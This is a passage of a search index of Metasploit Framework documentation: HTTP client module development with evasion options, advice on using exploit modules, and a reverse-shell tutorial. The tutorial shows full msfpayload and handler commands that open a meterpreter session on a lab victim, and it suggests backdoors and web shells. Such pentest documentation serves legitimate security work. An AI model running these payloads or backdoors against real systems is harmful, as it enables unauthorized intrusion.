\"||#{Rex::Text.uri_encode(cmd, 'hex-all')}||\" }, 'cookie' => \"PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1\", 'expire_cookies' => false }) . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#cookies--cookiejars",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#cookies--cookiejars"
  },"274": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "URI Parsing",
    "content": "Before you send an HTTP request, you will most likely have to do some URI parsing. This is a tricky task, because sometimes when you join paths, you may accidentally get double slashes, like this: “/test//index.php”. Or for some reason you have a missing slash. These are very common mistakes. So here’s how you can handle it safely: . 1 - Register your default URI datastore option as ‘TARGETURI’: . Example: . register_options( [ OptString.new('TARGETURI', [true, 'The base path to XXX application', '/xxx_v1/']) ] ) . 2 - Load your TARGETURI with target_uri; that way the URI input validation will kick in, and you get a real URI object: . In this example, we’ll just load the path: . uri = target_uri.path . 3 - When you want to join another URI, always use normalize_uri: . Example: . # Returns: \"/xxx_v1/admin/upload.php\" uri = normalize_uri(uri, 'admin', 'upload.php') . 4 - When you’re done normalizing the URI, you’re ready to use send_request_cgi or send_request_raw . Please note: The normalize_uri method will always follow these rules: . | The URI should always begin with a slash. | You will have to decide if you need the trailing slash or not. | There should be no double slashes. | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#uri-parsing",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#uri-parsing"
  },"275": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "Full Example",
    "content": "class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'HttpClient Example', 'Description' => %q{ Do a send_request_cgi() }, 'Author' => [ 'sinn3r' ], 'License' => MSF_LICENSE ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path', '/']) ] ) end def run uri = target_uri.path res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'admin', 'index.php'), 'vars_get' => { 'p1' => 'This is param 1', 'p2' => 'This is param 2' } }) if res && res.code == 200 print_good('I got a 200, awesome') else print_error('No 200, feeling blue') end end end . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#full-example",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#full-example"
  },"276": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "Working with Burp Suite",
    "content": "Burp Suite is a useful tool to examine or modify HTTPS traffic while developing a module using HttpClient. To do this: . | Start Burp: java -jar burpsuite.jar | In Burp, click on the Proxies tab, and then Options. Configure the proxy listener there. In this example, let’s say we have a listener on port 6666. | Once the Burp listener is up, start msfconsole and load the module you’re working on. | Enter: set Proxies HTTP:127.0.0.1:6666 | Go ahead and run the module; Burp should intercept the HTTPS traffic. | . Note that Burp only supports HTTPS for HttpClient. This problem is specific to Burp and Metasploit. If you need to examine HTTP traffic for HttpClient, a workaround is adding the following method in your module. This will override HttpClient’s send_request_* method, print the request and the response (when there is one), and return the response unchanged: . def send_request_cgi(opts) res = super(opts) if res puts res.request.to_s puts puts res.to_s puts puts end res end . You can do the same for send_request_raw as well. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#working-with-burp-suite",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#working-with-burp-suite"
  },"277": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "Other Common questions:",
    "content": "1 - Can I use vars_get and vars_post together? . Yes. When you supply a hash to vars_get, basically it means “put all this data in the query string”. When you supply a hash to vars_post, it means “put all this data in the body.” All of them will be in the same request. You do need to make sure you’re using send_request_cgi, of course. 2 - I can’t use vars_get or vars_post due to some weird reason, what to do? . Do mention this problem in the code (as a comment). If you can’t use vars_post, you can try the data key instead, which will send your post data raw. Normally, the most common solution to get around vars_get is to leave your stuff in the uri key. msftidy will flag this, but only as an “Info” and not a warning, which means you should still pass msftidy anyway. If this is a common problem, we can always change msftidy. 3 - Do I need to manually do basic auth? . You do not need to manually do basic auth in your request, because HttpClient should automatically do that for you. All you have to do is set the username and password in the datastore options, and then the mixin will use them when the web server asks. 4 - How do I send a MIME request? . See Rex::MIME::Message . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#other-common-questions",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#other-common-questions"
  },"278": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "References",
    "content": ". | How to send an HTTP request using Rex Proto Http Client | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#references",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html#references"
  },"279": {
    "doc": "How to Send an HTTP Request Using HttpClient",
    "title": "How to Send an HTTP Request Using HttpClient",
    "content": "The HttpClient mixin can be included with an exploit module in order to facilitate easier HTTP communications with a target machine. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-httpclient.html"
  },"280": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "How to send an HTTP request using Rex::Proto::Http::Client",
    "content": "The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly; instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the lib/msf/core directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the Msf::Exploit::Remote::HttpClient mixin (which is found in lib/msf/core/exploit/http/client) is most likely the one you want. However, in some scenarios, you actually can’t use the HttpClient mixin. The most common is when writing a form-based login module using the LoginScanner API. If you find yourself in that situation, use Rex::Proto::Http::Client. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#how-to-send-an-http-request-using-rexprotohttpclient",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#how-to-send-an-http-request-using-rexprotohttpclient"
  },"281": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Initializing Rex::Proto::Http::Client",
    "content": "The Rex::Proto::Http::Client initializer creates a new HTTP client instance, and the most important piece is this: . def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '') . As you can see, only the host argument is required; the rest are optional. But let’s go over all of them right quick: . | Argument name | Data type | Description | . | host | String | Target host IP | . | port | Fixnum | Target host port | . | context | Hash | Determines what is responsible for requesting that a socket can be created | . | ssl | Boolean | True to enable it | . | ssl_version | String | SSL2, SSL3, or TLS1 | . | proxies | String | Configure a proxy | . | username | String | Username for automatic authentication | . | password | String | Password for automatic authentication | . Code example of initializing Rex::Proto::Http::Client (SSL enabled, default SSL version): . cli = Rex::Proto::Http::Client.new(rhost, rport, {}, true, nil, proxies, 'username', 'password') . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#initializing-rexprotohttpclient",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#initializing-rexprotohttpclient"
  },"282": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Making an HTTP request",
    "content": "Even though our main topic of this documentation is about Rex::Proto::Http::Client, it does not know how to make HTTP requests. Instead, Rex::Proto::Http::ClientRequest is actually the mother of all Metasploit’s HTTP requests. So how does Rex::Proto::Http::ClientRequest give birth to an HTTP request? Well, you see son, it all begins when Rex::Proto::Http::Client asks for one with either the #request_cgi or the #request_raw method. The difference is that if #request_cgi is used, the request is meant to be CGI compatible, and in most cases this is what you want. If #request_raw is used, you get fewer options and less CGI compatibility. A raw HTTP request supports the following options: . | Option/key name | Data type | Description | . | query | String | Raw GET query string | . | data | String | Raw POST data string | . | uri | String | Raw URI string | . | ssl | Boolean | True to use https://, otherwise http:// | . | agent | String | User-Agent. Default is: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | . | method | String | HTTP method | . | proto | String | Protocol | . | version | String | Version | . | vhost | String | Host header | . | port | Fixnum | Port for the host header | . | authorization | String | The authorization header | . | cookie | String | The cookie header | . | connection | String | The connection header | . | headers | Hash | A hash of custom headers. Safer than raw_headers | . | raw_headers | String | A string of raw headers | . | ctype | String | Content type | . An example of using #request_raw’s options: . # cli is a Rex::Proto::Http::Client object req = cli.request_raw({ 'uri' =>'/test.php', 'method' => 'POST', 'data' => 'A=B' }) . #request_cgi inherits all the above, and more: . | Option/key name | Data type | Description | . | pad_get_params | Boolean | Enable padding for GET parameters | . | pad_get_params_count | Fixnum | Number of random GET parameters. 
You also need pad_get_params for this | . | vars_get | Hash | A hash of GET parameters | . | encode_params | Boolean | Enable URI encoding for GET or POST parameters | . | pad_post_params | Boolean | Enable padding for POST parameters | . | pad_post_params_count | Fixnum | Number of random POST parameters. You also need pad_post_params for this | . An example of using one of the #request_cgi options: . # cli is a Rex::Proto::Http::Client object req = cli.request_cgi({ 'uri' =>'/test.php', 'vars_get' => { 'param1' => 'value', 'param2' => 'value' } }) . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#making-an-http-request",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#making-an-http-request"
  },"283": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Sending an HTTP request",
    "content": "Here are examples of how to actually speak to an HTTP server with either #request_cgi or #request_raw: . ** request_cgi . cli = Rex::Proto::Http::Client.new(rhost) cli.connect req = cli.request_cgi({'uri'=>'/'}) res = cli.send_recv(req) cli.close . ** request_raw . cli = Rex::Proto::Http::Client.new(rhost) cli.connect req = cli.request_raw({'uri'=>'/'}) res = cli.send_recv(req) cli.close . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#sending-an-http-request",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#sending-an-http-request"
  },"284": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Configuring advanced options",
    "content": "Evasion Options . Rex::Proto::Http::Client also comes with its own collection of evasion options. You can set them either when you’re asking Rex::Proto::Http::ClientRequest to make the HTTP request, or you can set them with the #set_config method. The main difference is that if you are using #set_config, you should make these options user-configurable. | Option | Data type | Default | Known configurable option | . | encode_params | Boolean | true | N/A | . | encode | Boolean | false | N/A | . | uri_encode_mode | String | hex-normal | HTTP::uri_encode_mode | . | uri_encode_count | Fixnum | 1 | N/A | . | uri_full_url | Boolean | false | HTTP::uri_full_url | . | pad_method_uri_count | Fixnum | 1 | HTTP::pad_method_uri_count | . | pad_uri_version_count | Fixnum | 1 | HTTP::pad_uri_version_count | . | pad_method_uri_type | String | space | HTTP::pad_method_uri_type | . | pad_uri_version_type | String | space | HTTP::pad_uri_version_type | . | method_random_valid | Boolean | false | HTTP::method_random_valid | . | method_random_invalid | Boolean | false | HTTP::method_random_invalid | . | method_random_case | Boolean | false | HTTP::method_random_case | . | version_random_valid | Boolean | false | N/A | . | version_random_invalid | Boolean | false | N/A | . | version_random_case | Boolean | false | N/A | . | uri_dir_self_reference | Boolean | false | HTTP::uri_dir_self_reference | . | uri_dir_fake_relative | Boolean | false | HTTP::uri_dir_fake_relative | . | uri_use_backslashes | Boolean | false | HTTP::uri_use_backslashes | . | pad_fake_headers | Boolean | false | HTTP::pad_fake_headers | . | pad_fake_headers_count | Fixnum | 16 | HTTP::pad_fake_headers_count | . | pad_get_params | Boolean | false | HTTP::pad_get_params | . | pad_get_params_count | Fixnum | 8 | HTTP::pad_get_params_count | . | pad_post_params | Boolean | false | HTTP::pad_post_params | . | pad_post_params_count | Fixnum | 8 | HTTP::pad_post_params_count | . 
| uri_fake_end | Boolean | false | HTTP::uri_fake_end | . | uri_fake_params_start | Boolean | false | HTTP::uri_fake_params_start | . | header_folding | Boolean | false | HTTP::header_folding | . | chunked_size | Fixnum | 0 | N/A | . NTLM Options . HTTP authentication is automatic in Rex::Proto::Http::Client, and when it comes to the NTLM provider, it gets its own options. You MUST use the #set_config method to set them: . | Option | Data type | Default | Known configurable option | . | usentlm2_session | Boolean | true | NTLM::UseNTLM2_session | . | use_ntlmv2 | Boolean | true | NTLM::UseNTLMv2 | . | send_lm | Boolean | true | NTLM::SendLM | . | send_ntlm | Boolean | true | NTLM::SendNTLM | . | SendSPN | Boolean | true | NTLM::SendSPN | . | UseLMKey | Boolean | false | NTLM::UseLMKey | . | domain | String | WORKSTATION | DOMAIN | . | DigestAuthIIS | Boolean | true | DigestAuthIIS | . Note: “Known configurable option” means there is a datastore option for it from HttpClient. If you can’t use HttpClient, then you will have to consider registering them yourself. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#configuring-advanced-options",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#configuring-advanced-options"
  },"285": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "URI Parsing",
    "content": "Rex::Proto::Http::Client actually does not support URI parsing, so for URI format validation and normalization, you are on your own, and you should probably do it. For URI format validation, we recommend using Ruby’s URI module. You can use HttpClient’s #target_uri method as an example. For URI normalization, we recommend HttpClient’s #normalize_uri method as an example. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#uri-parsing",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#uri-parsing"
  },"286": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "Full Example",
    "content": "cli = Rex::Proto::Http::Client.new(rhost, rport, {}, ssl, ssl_version, proxies, user, pass) cli.set_config( 'vhost' =&amp;gt; vhost, 'agent' =&amp;gt; datastore['UserAgent'], 'uri_encode_mode' =&amp;gt; datastore['HTTP::uri_encode_mode'], 'uri_full_url' =&amp;gt; datastore['HTTP::uri_full_url'], 'pad_method_uri_count' =&amp;gt; datastore['HTTP::pad_method_uri_count'], 'pad_uri_version_count' =&amp;gt; datastore['HTTP::pad_uri_version_count'], 'pad_method_uri_type' =&amp;gt; datastore['HTTP::pad_method_uri_type'], 'pad_uri_version_type' =&amp;gt; datastore['HTTP::pad_uri_version_type'], 'method_random_valid' =&amp;gt; datastore['HTTP::method_random_valid'], 'method_random_invalid' =&amp;gt; datastore['HTTP::method_random_invalid'], 'method_random_case' =&amp;gt; datastore['HTTP::method_random_case'], 'uri_dir_self_reference' =&amp;gt; datastore['HTTP::uri_dir_self_reference'], 'uri_dir_fake_relative' =&amp;gt; datastore['HTTP::uri_dir_fake_relative'], 'uri_use_backslashes' =&amp;gt; datastore['HTTP::uri_use_backslashes'], 'pad_fake_headers' =&amp;gt; datastore['HTTP::pad_fake_headers'], 'pad_fake_headers_count' =&amp;gt; datastore['HTTP::pad_fake_headers_count'], 'pad_get_params' =&amp;gt; datastore['HTTP::pad_get_params'], 'pad_get_params_count' =&amp;gt; datastore['HTTP::pad_get_params_count'], 'pad_post_params' =&amp;gt; datastore['HTTP::pad_post_params'], 'pad_post_params_count' =&amp;gt; datastore['HTTP::pad_post_params_count'], 'uri_fake_end' =&amp;gt; datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' =&amp;gt; datastore['HTTP::uri_fake_params_start'], 'header_folding' =&amp;gt; datastore['HTTP::header_folding'], 'usentlm2_session' =&amp;gt; datastore['NTLM::UseNTLM2_session'], 'use_ntlmv2' =&amp;gt; datastore['NTLM::UseNTLMv2'], 'send_lm' =&amp;gt; datastore['NTLM::SendLM'], 'send_ntlm' =&amp;gt; datastore['NTLM::SendNTLM'], 'SendSPN' =&amp;gt; datastore['NTLM::SendSPN'], 'UseLMKey' =&amp;gt; datastore['NTLM::UseLMKey'], 'domain' 
=&amp;gt; datastore['DOMAIN'], 'DigestAuthIIS' =&amp;gt; datastore['DigestAuthIIS'] ) cli.connect req = cli.request_cgi({'uri'=&amp;gt;'/'}) res = cli.send_recv(req) cli.close . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#full-example",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html#full-example"
  },"287": {
    "doc": "How to send an HTTP request using Rex Proto Http Client",
    "title": "How to send an HTTP request using Rex Proto Http Client",
    "content": "Note: This documentation may need to be vetted. ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-send-an-http-request-using-rex-proto-http-client.html"
  },"288": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Loading a Metasploit module",
    "content": "Each Metasploit module comes with some metadata that explains what it’s about, and to see that you must load it first. An example: . msf &amp;gt; use exploit/windows/smb/ms08_067_netapi . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#loading-a-metasploit-module",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#loading-a-metasploit-module"
  },"289": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Read the module description and references",
    "content": "This may sound surprising, but sometimes we get asked questions that are already explained in the module. You should always look for the following in the description or the references it provides before deciding whether it’s appropriate to use the exploit or not: . | What products and versions are vulnerable: This is the most basic thing you should know about a vulnerability. | What type of vulnerability and how it works: Basically, you are learning the exploit’s side-effects. For example, if you’re exploiting a memory corruption, if it fails due to whatever reason, you may crash the service. Even if it doesn’t, when you’re done with the shell and type “exit”, it’s still possible to crash it too. High level bugs are generally safer, but not 100%. For example, maybe it needs to modify a config file or install something that can cause the application to be broken, and may become permanent. | Which ones have been tested: When a module is developed, usually the exploit isn’t tested against every single setup if there are too many. Usually the developers will just try to test whatever they can get their hands on. So if your target isn’t mentioned here, keep in mind there is no guarantee it’s going to work 100%. The safest thing to do is to actually recreate the environment your target has, and test the exploit before hitting the real thing. | What conditions the server must meet in order to be exploitable: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit’s check command, because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn’t always there, so you should try to find this information before running that “exploit” command. Sometimes it’s just common sense, really. 
For example: a web application’s file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn’t meet the requirement(s), there is no point in trying. | . You can use the info command to see the module’s description: . msf exploit(ms08_067_netapi) > info . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#read-the-module-description-and-references",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#read-the-module-description-and-references"
  },"290": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Read the target list",
    "content": "Every Metasploit exploit has a target list. Basically this is a list of setups the developers have tested before making the exploit publicly available. If your target machine isn’t on the list, it’s better to assume the exploit has never been tested on that particular setup. If the exploit supports automatic targeting, it is always the first item on the list (or index 0). The first item is also almost always the default target. What this means is that you should never assume the exploit will automatically select a target for you if you’ve never used it before, and that the default setup might not be the one you’re testing against. The “show options” command will tell you which target is selected. For example: . msf exploit(ms08_067_netapi) &amp;gt; show options . The “show targets” command will give you a list of targets supported: . msf exploit(ms08_067_netapi) &amp;gt; show targets . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#read-the-target-list",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#read-the-target-list"
  },"291": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Check all the options",
    "content": "All Metasploit modules come with most datastore options pre-configured. However, they may not be suitable for the particular setup you’re testing. To do a quick double-check, usually the “show options” command is enough: . msf exploit(ms08_067_netapi) &amp;gt; show options . However, “show options” only shows you all the basic options. It does not show you the evasive or advanced options (try “show evasion” and “show advanced”), the command you should use that shows you all the datastore options is actually the “set” command: . msf exploit(ms08_067_netapi) &amp;gt; set . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#check-all-the-options",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#check-all-the-options"
  },"292": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "Find the module’s pull request",
    "content": "The Metasploit repository is hosted on GitHub, and the developers/contributors rely on it heavily for development. Before a module is made public, it is submitted as a pull request for final testing and review. In there, you will find pretty much everything you need to know about the module, and probably things you won’t learn from reading the module’s description or some random blog post. The information is like gold, really. Things you might learn from reading a pull request: . | Steps on how to set up the vulnerable environment. | What targets were actually tested. | How the module is meant to be used. | How the module was verified. | What problems were identified. Problems you might want to know. | Demonstrations. | Other surprises. | . There are a few ways to find the pull request of the module you’re using: . | Via info -d in msfconsole: If you generate a personal access token and set it in your shell environment with export GITHUB_OAUTH_TOKEN your_token, the builtin documentation will show relevant pull requests for the current module. | Via the pull request number: If you actually know the pull request number, this is the easiest. Simply go: . | . https://github.com/rapid7/metasploit-framework/pull/[PULL REQUEST NUMBER HERE] . | Via filters: This is most likely how you find the pull request. First off, you should go here: https://github.com/rapid7/metasploit-framework/pulls. At the top, you will see a search input box with the default filters: is:pr is:open. These default ones mean you’re looking at pull requests, and you’re looking at the ones that are still pending - still waiting to be merged to Metasploit. Well, since you’re finding the one that’s already merged, you should do these: | . | Click on “Closed”. | Select label “module”. | In the search box, enter additional keywords related to the module. The module’s title probably provides the best keywords. | . 
Note: If the module was written before Nov 2011, you WILL NOT find the pull request for it. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#find-the-modules-pull-request",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html#find-the-modules-pull-request"
  },"293": {
    "doc": "How to use a Metasploit module appropriately",
    "title": "How to use a Metasploit module appropriately",
    "content": "As an user, one thing we love Metasploit the most is it allows something really technically difficult to understand or engineer into something really easy to use, literally within a few clicks away to make you look like Neo from the Matrix. It makes hacking super easy. However, if you’re new to Metasploit, know this: Nobody makes their first jump. You are expected to make mistakes, sometimes small, sometimes catastrophic… hopefully not. You’re very likely to fall on your face with your first exploit, just like Neo. Obviously, to become The One you must learn to use these modules appropriately, and we will teach you how. In this documentation, understand that we require you no exploit development knowledge. Some programming knowledge would be nice, of course. The whole point is that there is actually “homework” before using an exploit, and you should always do your homework. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-metasploit-module-appropriately.html"
  },"294": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "On this page",
    "content": ". | List of Metasploit reverse shells . | Windows common reverse shell | Linux common reverse shell | . | When to use a reverse shell | When a reverse shell isn’t needed | How to set up for a reverse shell during payload generation | Demonstration . | Step 1: Generate the executable payload | Step 2: Copy the executable payload to box B | Step 3: Set up the payload handler on box A | Step 4: Double-click on the malicious executable | Step 5: View the meterpreter/payload session on box A | . | . There are two popular types of shells: bind and reverse. Bind shell - Opens up a new service on the target machine and requires the attacker to connect to it to get a session. Reverse shell - A reverse shell is also known as a connect-back. It requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally, the attacker receives the shell. You can learn more about the primary use of payloads in the 5.2.4 Selecting the Payload section of the old Metasploit Users Guide. This article goes over using a reverse shell to get a session. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#on-this-page",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#on-this-page"
  },"295": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "List of Metasploit reverse shells",
    "content": "To get a list of reverse shells, use the msfpayload command. B ./msfpayload -l |grep reverse . As a rule of thumb, always pick a Meterpreter, because it currently provides better support of the post-exploitation Metasploit has to offer. For example, railgun, post modules, different meterpreter commands. Windows common reverse shell . In Windows, the most commonly used reverse shell is windows/meterpreter/reverse. You can also use windows/meterpreter/reverse_http or windows/meterpreter/reverse_https because their network traffic appears a little bit less abnormal. Linux common reverse shell . In Linux, you can try linux/x86/meterpreter/reverse_tcp, or the 64-bit one. The linux/x86/shell_reverse_tcp has been the most stable. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#list-of-metasploit-reverse-shells",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#list-of-metasploit-reverse-shells"
  },"296": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "When to use a reverse shell",
    "content": "If you find yourself in one of the following scenarios, then you should consider using a reverse shell: . | The target machine is behind a different private network. | The target machine’s firewall blocks incoming connection attempts to your bindshell. | Your payload is unable to bind to the port it wants due to whatever reason. | You can’t decide what to choose. | . ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#when-to-use-a-reverse-shell",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#when-to-use-a-reverse-shell"
  },"297": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "When a reverse shell isn’t needed",
    "content": "Generally speaking, if you can backdoor an existing service, you may not need a reverse shell. For example, if the target machine is already running an SSH server, then you can try adding a new user to it and use that. If the target machine is running a web server that supports a server-side programming language, then you can leave a backdoor in that language. For example, many Apache servers support PHP, then you can use a PHP “web shell”. IIS servers usually support ASP or ASP.net. The Metasploit Framework offers payloads in all these languages and many others. This also applied to VNC, remote desktop, SMB (psexec), or other remote admin tools, etc. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#when-a-reverse-shell-isnt-needed",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#when-a-reverse-shell-isnt-needed"
  },"298": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "How to set up for a reverse shell during payload generation",
    "content": "When you generate a reverse shell with either msfpayload or msfvenom, you must know how to configure the following: . | LHOST - This is the IP address you want your target machine to connect to. If you’re in a local area network, it is unlikely your target machine can reach you unless you both are on the same network. In that case, you will have to find out your public-facing IP address, and then configure your network to port-forward that connection to your box. LHOST should not be “localhost”, or “0.0.0.0”, or “127.0.0.1”, because if you do, you’re telling the target machine to connect to itself (or it may not work at all). | LPORT - This the port you want your target machine to connect to. | . When you set up a listener for the reverse shell, you also at least need to configure LHOST and LPORT, but slightly different meanings (different perspective): . | LHOST - This is the IP address you want your listener to bind to. | LPORT - This is the port you want your listener to bind to. | . You should make sure the listener has started first before executing the reverse shell. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#how-to-set-up-for-a-reverse-shell-during-payload-generation",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#how-to-set-up-for-a-reverse-shell-during-payload-generation"
  },"299": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "Demonstration",
    "content": "In this demonstration, we have two boxes: . Box A: . | The attacker’s box that receives the payload session | IP is: 192.168.1.123 (ifconfig) | On the same network as the victim machine | . Box B: . | The “victim” machine | Windows XP | IP is: 192.168.1.80 (ipconfig) | On the same network as the attacker machine | For testing purposes, no antivirus enabled. | For testing purposes, no firewall enabled, either. | . Step 1: Generate the executable payload . On the attacker’s box, run msfpayload or msfvenom: . $ ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 X &amp;gt; /tmp/iambad.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 287 Options: {\"LHOST\"=&amp;gt;\"192.168.1.123\", \"LPORT\"=&amp;gt;\"4444\"} . Step 2: Copy the executable payload to box B . Box B is the victim machine. Step 3: Set up the payload handler on box A . Box A is the attacker machine. $ ./msfconsole -q msf &amp;gt; use exploit/multi/handler msf exploit(handler) &amp;gt; set payload windows/meterpreter/reverse_tcp payload =&amp;gt; windows/meterpreter/reverse_tcp msf exploit(handler) &amp;gt; set lhost 192.168.1.123 lhost =&amp;gt; 192.168.1.123 msf exploit(handler) &amp;gt; set lport 4444 lport =&amp;gt; 4444 msf exploit(handler) &amp;gt; run [*] Started reverse handler on 192.168.1.123:4444 [*] Starting the payload handler... Step 4: Double-click on the malicious executable . This step requires no further explanation. Step 5: View the meterpreter/payload session on box A . 
$ ./msfconsole -q msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.123 lhost => 192.168.1.123 msf exploit(handler) > set lport 4444 lport => 4444 msf exploit(handler) > run [*] Started reverse handler on 192.168.1.123:4444 [*] Starting the payload handler... [*] Sending stage (770048 bytes) to 192.168.1.80 [*] Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500 meterpreter > . The meterpreter prompt means you are currently interacting with the payload. ",
    "url": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#demonstration",
    "relUrl": "/docs/using-metasploit/basics/how-to-use-a-reverse-shell-in-metasploit.html#demonstration"
  },"300": {
    "doc": "How to use a reverse shell in Metasploit",
    "title": "How to use a reverse shell in Metasploit",
    "content": " ",
